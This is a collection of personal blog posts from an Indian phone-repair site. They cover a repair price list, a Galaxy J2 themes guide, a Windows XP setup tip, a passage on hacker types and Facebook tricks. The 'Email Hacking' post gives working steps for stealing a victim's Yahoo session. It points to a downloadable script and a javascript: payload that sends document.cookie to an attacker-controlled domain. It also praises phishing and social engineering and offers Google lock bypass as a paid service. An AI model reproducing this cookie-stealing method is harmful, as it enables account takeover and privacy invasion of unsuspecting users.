Wednesday, 5 December 2018

Software Upgrade

Software upgrade and bugs fix

1. Screen lock(Pattern) 2. Phone lock(Google Bypass) 3. Hang problem 4. Root & Unroot 5. Rom flash 6. Software Upgrade 7. Others

    
    Mobile | Price

SAMSUNG - ₹120


RedMi - ₹120

Oppo - ₹120

ViVo - ₹100

RealMe - ₹120

Moto[le,mm,sp,la,oth] - ₹100

Jio phone - ₹100



Contact us:
Owner- Titam Sarkar
Co-Ast - Akash Rout
Mobile No: +91 8210741547
Email: t.s.titam.ts@gmail.com

Thursday, 3 May 2018

Install themes in Galaxy J2 and More

Hii..
       Guys
Aaj hum baat karne wale hai ki aap kese Galaxy J2 main themes install ya download kar sakte hai...
                         
To sabse pehle aapko ek zip file download karna hoga jiska link ye hai..👇👇👇
https://drive.google.com/file/d/1JfprHEHjBQma60ma_t5H2G1ggbhLho-M/view?usp=drivesdk

Steps :-

1. Extract the zip file

2. Open the folder

3. And install the Themes app

4. now open the J2 Themes folder

 

5. Install any themes

6. Now go to Home screen and Press and hold

7. Click com.sec.android.app.the

8. And choice any themes

9. And Press Apply

10. Now injoy


J2 Themes Video 

Subscribe our youtube channel 

Tuesday, 17 April 2018

Email Hacking

Email Hacking Techniques:
Do U Think If Your Email Can Not Been Hackable, Then You Are Wrong…
Ur Email-ID Can Be Hacked… But Its Can Be Hack Only Fault by User.. Most Of The Peoples Think That Their Has A Software to Hack A Email- ID’s But Truth Is There Is No Software Present For Hacking Ur Mail ID’s..

Email Hacking can be possible to many ways like:-
3. Cookie Hijacking
4. By Keyloggers
Social Engineering:
This Process is defined as Hack the human mind without any tools…
This has become one of the hottest topics today and it seems to work out most of the times. Social Engineering doesn’t deal with the network security issues, vulnerabilities, exploits, etc. It just deals with simple Psychological tricks that help to get the information we want.
This really works!! But it requires a lot of patience.
We are all talking about network security and fixing the vulnerabilities in networks.
But what happens if some internal person of a network accidentally gives out the passwords. After all we are all humans; we are also vulnerable and can be easily exploited and compromised than the computers.
Social Engineering attacks have become most common during the chat sessions.
With the increase in use of Instant Messengers, any anonymous person may have a chat with another anywhere in the world. The most crucial part of this attack is to win the trust of the victim.

Phishing Attack:
The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organisation already has. The Web site, however, is bogus and set up only to steal the user’s information

Cookie Hijacking:
In cookie hijacking we can hack email accounts very easily.. This trick is very dangerous because whenever user change a password then there is no need to attacker for again hack Email- ID of victim. And it would take you to inbox of victim’s yahoo account without asking for any password of victim account.
U Can Hack Yahoo Account by Cookies Stealing or Hijacking From Browser.
Follow Steps and Learn it.
This is very Simple Tutorial and 100% Tested..!!

Step 1: Download the Script on given link
http://www.multiupload.com/9Q3EPTOO47
Step:2 Download and extract files to your hard drive.
Step:3 Create an account in any FTP hosting site i suggested www.t35.com
Step4: Login to your account and upload 4 files into your FTP account.
Step5: Give this code to victim to run in his browser when he would be logged into his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory ‘cookies’.
javascript:document.location=’http://yourdomain.com/yahoo.php?ex=’.concat(escape(document.cookie));
He would again redirected to his yahoo account.
Step6. Open the hacked.php . The password is ‘hoc’.


You must have got the username of victim’s account. Simply Click on it and it would take you to inbox of victim’s yahoo account without asking for any password of victim account.

Keyloggers:
Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.

Install Window XP In 10Min

>>Hey Guys Diz Time Extreme Hack That You Will Never Imagine But Its Truth and We have Done It. This Time I will explain How to Install Windows XP In Just 10 minutes.<< 
Read On Enjoyyyyyy!~

As We all know that During Formatting a Computer After the File Copying is Completed then windows Require 39 Minutes Time…But What Extreme In It…. Yes We can Bypass this faking Time …. How TO DO IT??? So read On..

I have Included Snaps Shots That will help you.

>> INSTALLING WIN XP IN 10 MINUTES! <<

STEP1 : After the Copy Part is Over … System is Rebooted as we all know In general Foramatting Procedure…
Now After Reboot The Below Image Will Appear….
STEP 2: Now As This Image APPEARS You Have to Press “Shift + F10 ” . This Will Open The command Prompt… Now type taskmgr in it. This will open the Task manager .
STEP 3 : After The task Manager Opens Goto Processes … And Find “Setup.exe” process and Right CLICK on It…. and set the Priority to Highest….
STEP 4: Now Just Watch the Set It will take around 9 minutes and 2 minutes for Tolerance(depends System to system)….
Thats the Overall Tutorial…Hope You all Have LIKED IT…
So When you Format your PC Next Time It will Really Save Your TIME i.e around 20 to 25 minutes….Enjoy Hacking.~

Monday, 16 April 2018

Hackers Types

Hackers are of three types:-


1. White hat hacker
2. Gray hat hacker
3. Black hat hacker

White Hat and Grey Hat Hacker & What is the Real Difference?

What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.


So, what is ethical hacking white hat and how does it differentiate from grey hackers? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.


What Is A White Hat Hacker?
The term "white hat" in Internet slang refers to an ethical computer hacker, or a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems.[1] Ethical hacking is a term meant to imply a broader category than just penetration testing.[2][3] Contrasted with black hat, a malicious hacker, the name comes from Western films, where heroic and antagonistic cowboys might traditionally wear a white and a black hat respectively.[4]

White-hat hackers may also work in teams called "sneakers",[5] red teams, or tiger teams.[6]
Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hacker, also known as a cracker, someone who uses his computer knowledge in criminal activities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.
On the other side is the white hat hacker. Although white hat hacking can be considered similar to a black hacker, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world, who want to test their systems, contract white hackers. They will test how secure are their systems, and point any faults that they may found. If you want to become a hacker with a white hat, Linux, a PC and an internet connection is all you need.


Grey Hat Hackers
A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.
The term "grey hat", alternatively spelled as "greyhat" or "gray hat", refers to a computer hacker or computer security expert who may sometimes violate laws or typical ethical standards, but does not have the malicious intent typical of a black hat hacker.
The term began to be used in the late 1990s, derived from the concepts of "white hat" and "black hat" hackers.[1] When a white hat hacker discovers a vulnerability, they will exploit it only with permission and not divulge its existence until it has been fixed, whereas the black hat will illegally exploit it and/or tell others how to do so. The grey hat will neither illegally exploit it, nor tell others how to do so.[2]
A further difference among these types of hacker lies in their methods of discovering vulnerabilities. The white hat breaks into systems and networks at the request of their employer or with explicit permission for the purpose of determining how secure it is against hackers, whereas the black hat will break into any system or network in order to uncover sensitive information and for personal gain. The grey hat generally has the skills and intent of the white hat but will break into any system or network without permission.[3][4]
According to one definition of a grey-hat hacker, when they discover a vulnerability, instead of telling the vendor how the exploit works, he or she may offer to repair it for a small fee. When one successfully gains illegal access to a system or network, he or she may suggest to the system administrator that one of his or her friends be hired to fix the problem; however, this practice has been declining due to the increasing willingness of businesses to prosecute. Another definition of Grey hat maintains that Grey hat hackers only arguably violate the law in an effort to research and improve security: legality being set according to the particular ramifications of any hacks they participate in.[5]
In the search engine optimization (SEO) community, grey hat hackers are those who manipulate web sites' search engine rankings using improper or unethical means but that are not considered search engine spam.[6]

Black Hat Hackers
Black hat hackers have become the iconic image of all hackers around the world. For the majority of computer users, the word hacker has become a synonym for social misfits and criminals. Of course, that is an injustice created by our own interpretation of the mass media, so it is important for us to learn what a hacker is and what a black hacker (or cracker) does. So, let’s learn about black hat techniques and how they make our lives a little more difficult.

black hat hacker (or black-hat hacker) is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain".[1]
The term was coined by hacker culturetheorist Richard Stallman to contrast the exploitative hacker with the white hat hacker who hacks protectively by drawing attention to vulnerabilities in computer systems that require repair.[2] The black hat/white hat terminology originates in the Western genre of popular American culture, in which black and white hats denote villainous and heroic cowboys respectively.[3]
Black hat hackers are the stereotypically illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal".[4]Black hat hackers break into secure networks to destroy, modify, or steal data, or to make the networks unusable for authorized network users.[5]

Sunday, 15 April 2018

Facebook Tricks (Hack/Safe)

How To Trace Your Facebook Profile Visitors
Now here we found who recently visited your profile.
Follow below steps to know your FB recent visitors.
Step 1) Go to your Facebook Profile Page.
Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.
Step 3) Now press Ctrl + F from your keyboard to open search box.
Step 4) Now search this code {“list”:
Step 5) You find some Facebook Profile Ids are like shown below. Click on example image for zoom.

Step 6) There are some Facebook Profile Ids of your friends who visited recently.
Step 7) The first one ID’s are showing visits the most number of time.
Step 8) Now if your want to find out, Open a new tab Enter below link :
www.facebook.com/Facebook Profile Id
For Example : www.facebook.com/100001257992988
Enjoy The Trick.. ðŸ™‚
AVOID FRIEND REQUEST BLOCK
We usually send friend requests and if it’s not accepted it is kept in pending.
If there are lots of pending requests it may lead to block.
So this is a simple way to get those requests cancelled and protect your account.
Follow below steps :-
1. Go to account settings.
2. Select `download a copy` option.
3. Choose `expanded archive` from the next page opened and enter your password and click continue.
4. Select `start my archive`.
5. After few hours you’ll get the download link in your email.
5. Download the file `facebook` and unzip it.
6. Open the folder html and then `friend_requests.htm­l`.
7. You can see the list of your friend requests and pending lists.

Now go to their accounts and click cancel request.

That’s all You are done now. Your account is safe.
loading...
TS SYSTEM. Powered by Blogger.